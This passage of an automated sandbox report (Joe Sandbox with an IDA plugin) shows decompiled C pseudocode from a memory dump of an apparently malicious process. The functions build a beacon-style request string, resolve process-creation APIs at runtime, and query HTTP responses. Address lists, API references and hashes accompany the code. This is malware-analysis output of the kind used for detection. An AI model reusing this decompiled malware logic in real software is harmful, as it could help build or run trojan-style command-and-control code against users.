											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x109a3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x109a380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x109a388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x109a384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x109a3c8 = 1;
							__eflags =  *0x109a3c8;
							if( *0x109a3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x109a3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x109a388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x109a380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x109a388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x109a388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x0109849b
0x0109849e
0x010984a4
0x010984c2
0x00000000
0x010984c2
0x010984ac
0x010984b5
0x010984bb
0x010984ca
0x010984cd
0x010984d0
0x010984da
0x010984da
0x010984dc
0x010984df
0x010984e1
0x010984e1
0x010984e3
0x010984e6
0x00000000
0x00000000
0x010984e8
0x010984ea
0x01098550
0x01098550
0x010986ae
0x00000000
0x010986ae
0x010984ec
0x010984ec
0x010984f0
0x010984f2
0x010984f2
0x010984f2
0x010984f2
0x010984f5
0x010984f6
0x010984f9
0x010984f9
0x010984fd
0x01098501
0x0109850f
0x0109850f
0x01098517
0x0109851d
0x0109851f
0x01098521
0x01098531
0x0109853e
0x01098542
0x01098547
0x01098549
0x010985c7
0x010985c7
0x0109854b
0x0109854b
0x0109854b
0x010985c9
0x010985cb
0x010986ac
0x010986ac
0x00000000
0x010985d1
0x010985d1
0x010985d8
0x00000000
0x00000000
0x010985de
0x010985e2
0x0109863e
0x01098640
0x01098648
0x0109864a
0x0109864c
0x00000000
0x00000000
0x0109864e
0x01098654
0x01098656
0x01098658
0x0109866d
0x0109866d
0x0109866f
0x0109869e
0x010986a5
0x00000000
0x010986a5
0x01098673
0x01098674
0x01098676
0x01098678
0x01098678
0x0109867a
0x0109867c
0x0109867e
0x01098692
0x01098692
0x01098695
0x01098697
0x01098697
0x01098698
0x01098698
0x00000000
0x01098680
0x01098680
0x01098680
0x01098689
0x0109868a
0x0109868c
0x0109868e
0x0109868e
0x00000000
0x01098680
0x0109867e
0x0109865a
0x01098661
0x01098661
0x01098663
0x00000000
0x00000000
0x01098665
0x01098666
0x01098669
0x0109866b
0x00000000
0x00000000
0x00000000
0x0109866b
0x00000000
0x01098661
0x010985e4
0x010985e7
0x010985ec
0x00000000
0x00000000
0x010985f5
0x010985f7
0x010985fd
0x00000000
0x00000000
0x01098603
0x01098609
0x00000000
0x00000000
0x0109860f
0x01098611
0x0109861a
0x0109861e
0x00000000
0x00000000
0x01098624
0x01098627
0x01098629
0x00000000
0x00000000
0x01098630
0x01098632
0x00000000
0x00000000
0x01098634
0x01098638
0x00000000
0x00000000
0x00000000
0x01098638
0x00000000
0x00000000
0x00000000
0x01098523
0x01098523
0x01098523
0x0109852a
0x00000000
0x00000000
0x0109852c
0x0109852d
0x0109852f
0x00000000
0x00000000
0x00000000
0x0109852f
0x01098557
0x01098559
0x00000000
0x00000000
0x01098569
0x0109856b
0x0109856d
0x00000000
0x00000000
0x01098573
0x0109857a
0x010985a6
0x010985a6
0x010985a8
0x010985aa
0x010985be
0x010985c0
0x00000000
0x00000000
0x00000000
0x00000000
0x010985ac
0x010985ac
0x010985ac
0x010985b5
0x010985b6
0x010985b8
0x010985ba
0x010985ba
0x00000000
0x010985ac
0x0109857c
0x0109857c
0x0109857f
0x01098581
0x01098593
0x01098593
0x01098596
0x01098598
0x01098598
0x01098599
0x01098599
0x0109859f
0x0109859f
0x00000000
0x00000000
0x00000000
0x00000000
0x01098583
0x01098583
0x01098583
0x0109858a
0x00000000
0x00000000
0x0109858c
0x0109858c
0x0109858d
0x00000000
0x00000000
0x00000000
0x0109858d
0x0109858f
0x01098591
0x010985a4
0x00000000
0x00000000
0x00000000
0x010985a4
0x00000000
0x01098591
0x01098503
0x01098506
0x01098509
0x00000000
0x00000000
0x0109850b
0x0109850d
0x00000000
0x00000000
0x00000000
0x0109850d
0x010984d2
0x010984d4
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01098542

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 5dc9f3bc2539d94c4cad347917fb90cd2e50f1e2094aeafef9aa379c6a5dbc43
Instruction ID: fb71311eeb8505f3d1f32be3116552b59a25bf471780c528382d12d23e36a1ca
Opcode Fuzzy Hash: 5dc9f3bc2539d94c4cad347917fb90cd2e50f1e2094aeafef9aa379c6a5dbc43
Instruction Fuzzy Hash: 2761C63070060ADBDF6ACE2CC8B066937E5BB47354B24C5ABE5C5CB389E775D845A780

Uniqueness

Uniqueness Score: -1.00%

Function 01091910 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E01091910(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x109a018; // 0x99c08bf
				asm("bswap eax");
				_t70 =  *0x109a014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x109a010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x109a00c; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x109a348; // 0xa6d5a8
				_t3 = _t73 + 0x109b62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d189, _t72, _t71, _t70, _t69,  *0x109a02c,  *0x109a004, _t68);
				_t76 = E01092C6E();
				_t77 =  *0x109a348; // 0xa6d5a8
				_t4 = _t77 + 0x109b66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x109a348; // 0xa6d5a8
					_t8 = _t148 + 0x109b676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x109a348; // 0xa6d5a8
				_t10 = _t81 + 0x109b78e; // 0x1b08d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x109b2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x109a36c; // 0x1b095b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x109a348; // 0xa6d5a8
					_t16 = _t144 + 0x109b889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E0109131C(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x109a348; // 0xa6d5a8
					_t19 = _t139 + 0x109b8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x109a2d8, 0, _a40);
				}
				_t87 = E010916DD();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x109a348; // 0xa6d5a8
					_t23 = _t135 + 0x109b8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x109a2d8, 0, _a40);
				}
				_t166 =  *0x109a3cc; // 0x1b09600
				_t89 = E01093A89(0x109a00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x109a2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x109a2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x109a2d8, _t172, _a8);
						goto L30;
					}
					E0109785D(GetTickCount());
					_t96 =  *0x109a3cc; // 0x1b09600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x109a3cc; // 0x1b09600
					__imp__(_t100 + 0x40);
					_t102 =  *0x109a3cc; // 0x1b09600
					_t168 = E0109581D(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x109a2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x1099280);
					_push(_t168);
					_t108 = E010911A3();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x109a2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E01094881( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E01091103();
						L26:
						HeapFree( *0x109a2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E01093967(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E01094EF8(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E0109692B(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E01092DA0(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E0109692B(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x01091910
0x01091910
0x01091914
0x0109191b
0x01091925
0x01091927
0x01091927
0x01091934
0x0109193f
0x01091942
0x0109194d
0x01091950
0x01091955
0x01091958
0x0109195d
0x01091960
0x0109196c
0x01091979
0x0109197b
0x01091981
0x01091986
0x01091991
0x01091993
0x01091996
0x0109199d
0x0109199f
0x010919a8
0x010919b3
0x010919b5
0x010919b8
0x010919b8
0x010919ba
0x010919bf
0x010919bf
0x010919c7
0x010919cb
0x010919d1
0x010919dc
0x010919de
0x010919e3
0x010919e8
0x010919eb
0x010919f0
0x010919fb
0x010919fd
0x01091a00
0x01091a00
0x01091a02
0x01091a0d
0x01091a13
0x01091a16
0x01091a1b
0x01091a26
0x01091a28
0x01091a2f
0x01091a39
0x01091a39
0x01091a3b
0x01091a40
0x01091a46
0x01091a49
0x01091a4e
0x01091a58
0x01091a5a
0x01091a69
0x01091a69
0x01091a6b
0x01091a79
0x01091a7e
0x01091a80
0x01091a86
0x01091c66
0x01091c6e
0x01091c7b
0x01091a8c
0x01091a98
0x01091a9e
0x01091aa4
0x01091c59
0x01091c64
0x00000000
0x01091c64
0x01091ab0
0x01091ab5
0x01091abe
0x01091acf
0x01091ad3
0x01091adc
0x01091ae2
0x01091aef
0x01091afc
0x01091b02
0x01091c4c
0x01091c57
0x00000000
0x01091c57
0x01091b0e
0x01091b14
0x01091b15
0x01091b1a
0x01091b20
0x01091c42
0x01091c4a
0x00000000
0x01091c4a
0x01091b2a
0x01091b31
0x01091b3b
0x01091b41
0x01091b4b
0x01091b5d
0x01091b5f
0x01091b65
0x01091c7e
0x01091c2d
0x01091c2d
0x01091c32
0x01091c3e
0x01091c40
0x00000000
0x01091c40
0x01091b70
0x01091b75
0x01091b7b
0x01091b86
0x01091b91
0x01091b95
0x01091b9b
0x01091ba1
0x01091ba7
0x01091baa
0x01091bb0
0x01091bb3
0x01091bb8
0x01091bbc
0x01091bbc
0x01091bc9
0x01091bd7
0x01091bdc
0x01091bde
0x01091be4
0x01091bea
0x01091bec
0x01091bf1
0x01091bf5
0x01091c11
0x01091c11
0x01091be4
0x00000000
0x01091bcb
0x01091bd0
0x01091c13
0x01091c17
0x01091c21
0x00000000
0x00000000
0x00000000
0x00000000
0x01091c21
0x01091bd2
0x00000000
0x01091bd2
0x01091bc9

APIs

GetTickCount.KERNEL32 ref: 01091927
wsprintfA.USER32 ref: 01091974
wsprintfA.USER32 ref: 01091991
wsprintfA.USER32 ref: 010919B3
wsprintfA.USER32 ref: 010919DA
wsprintfA.USER32 ref: 010919FB
wsprintfA.USER32 ref: 01091A26
HeapFree.KERNEL32(00000000,?), ref: 01091A39
wsprintfA.USER32 ref: 01091A58
HeapFree.KERNEL32(00000000,?), ref: 01091A69

Part of subcall function 01093A89: RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01093AA5
Part of subcall function 01093A89: RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01093AC3

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01091A98
GetTickCount.KERNEL32 ref: 01091AAA
RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01091ABE
RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01091ADC

Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
Part of subcall function 0109581D: lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850
Part of subcall function 0109581D: strcpy.NTDLL ref: 01095867
Part of subcall function 0109581D: lstrcat.KERNEL32(00000000,00000000), ref: 01095872
Part of subcall function 0109581D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F

StrTrimA.SHLWAPI(00000000,01099280,?,01B09600), ref: 01091B0E

Part of subcall function 010911A3: lstrlen.KERNEL32(01B09BD0,00000000,00000000,00000000,01093879,00000000), ref: 010911B3
Part of subcall function 010911A3: lstrlen.KERNEL32(?), ref: 010911BB
Part of subcall function 010911A3: lstrcpy.KERNEL32(00000000,01B09BD0), ref: 010911CF
Part of subcall function 010911A3: lstrcat.KERNEL32(00000000,?), ref: 010911DA

lstrcpy.KERNEL32(00000000,?), ref: 01091B31
lstrcpy.KERNEL32(?,?), ref: 01091B3B
lstrcat.KERNEL32(?,?), ref: 01091B4B
lstrcat.KERNEL32(?,00000000), ref: 01091B52

Part of subcall function 01094881: lstrlen.KERNEL32(?,00000000,01B09DD8,00000000,0109166A,01B09FFB,69B25F44,?,?,?,?,69B25F44,00000005,0109A00C,4D283A53,?), ref: 01094888
Part of subcall function 01094881: mbstowcs.NTDLL ref: 010948B1
Part of subcall function 01094881: memset.NTDLL ref: 010948C3

wcstombs.NTDLL ref: 01091BF5

Part of subcall function 01094EF8: SysAllocString.OLEAUT32(?), ref: 01094F33

Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937

HeapFree.KERNEL32(00000000,?), ref: 01091C3E
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01091C4A
HeapFree.KERNEL32(00000000,?,?,01B09600), ref: 01091C57
HeapFree.KERNEL32(00000000,?), ref: 01091C64
HeapFree.KERNEL32(00000000,?), ref: 01091C6E

Strings

Uqt, xrefs: 01091A07

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uqt
API String ID: 1185349883-2320327147
Opcode ID: ce93f0cff4340a6a3377a5d87c2ab69322b7f90f4399c68339c0ebe34f1a8354
Instruction ID: 7c1a22dba371b38707cdaff8f9d36aa1251e3320af372db91f3a0c875f949264
Opcode Fuzzy Hash: ce93f0cff4340a6a3377a5d87c2ab69322b7f90f4399c68339c0ebe34f1a8354
Instruction Fuzzy Hash: 39A19D71604215EFCB619F68DCA8E9A7BE8FF88364F044968F4C8D7260CB3AD845DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01097066 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01097066(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0109151D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E010979F1( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x109a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x109a348; // 0xa6d5a8
					_t18 = _t47 + 0x109b3f3; // 0x73797325
					_t68 = E01096F67(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x109a348; // 0xa6d5a8
						_t19 = _t50 + 0x109b73f; // 0x1b08ce7
						_t20 = _t50 + 0x109b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E01091897();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E01091897();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x109a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0109692B(_t70);
				goto L12;
			}

0x0109706e
0x0109706e
0x0109707d
0x01097084
0x01097089
0x01097196
0x0109719d
0x0109719d
0x01097098
0x010970a0
0x010970a3
0x010970a8
0x010970bd
0x010970c3
0x010970c4
0x010970c7
0x010970cd
0x010970d0
0x010970d5
0x010970dd
0x010970e9
0x010970ed
0x0109717d
0x010970f3
0x010970f3
0x010970f8
0x010970ff
0x01097113
0x01097117
0x01097166
0x01097119
0x0109711a
0x01097121
0x0109713a
0x0109713c
0x01097140
0x01097147
0x01097161
0x01097149
0x01097152
0x01097157
0x01097157
0x01097147
0x01097175
0x01097175
0x010970ed
0x01097184
0x0109718d
0x01097191
0x00000000

APIs

Part of subcall function 0109151D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01097082,?,?,?,?,00000000,00000000), ref: 01091542
Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01091564
Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0109157A
Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01091590
Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010915A6
Part of subcall function 0109151D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010915BC

memset.NTDLL ref: 010970D0

Part of subcall function 01096F67: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,010970E9,73797325), ref: 01096F78
Part of subcall function 01096F67: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01096F92

GetModuleHandleA.KERNEL32(4E52454B,01B08CE7,73797325), ref: 01097106
GetProcAddress.KERNEL32(00000000), ref: 0109710D
HeapFree.KERNEL32(00000000,00000000), ref: 01097175

Part of subcall function 01091897: GetProcAddress.KERNEL32(36776F57,01095FDD), ref: 010918B2

CloseHandle.KERNEL32(00000000,00000001), ref: 01097152
CloseHandle.KERNEL32(?), ref: 01097157
GetLastError.KERNEL32(00000001), ref: 0109715B

Strings

Uqt, xrefs: 01097175
@MqtNqt, xrefs: 0109715B

Memory Dump Source

Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3075724336-3266969629
Opcode ID: 07cf04a76a489fda26687e396d3ac0fb26002892cd29fe3477ab4a3304eab1f2
Instruction ID: eceb90b41c48358a8e80336fb6bfab8b6a5640c2863cdc49ce3a577074c89343
Opcode Fuzzy Hash: 07cf04a76a489fda26687e396d3ac0fb26002892cd29fe3477ab4a3304eab1f2
Instruction Fuzzy Hash: 83314DB2900209BFDF20AFA8DC98DDEBBBDFB48254F004469F685A7110D7359944DF50

Uniqueness

Uniqueness Score: -1.00%

Function 010959B3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010959B3(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E01096A51(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E0109692B(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
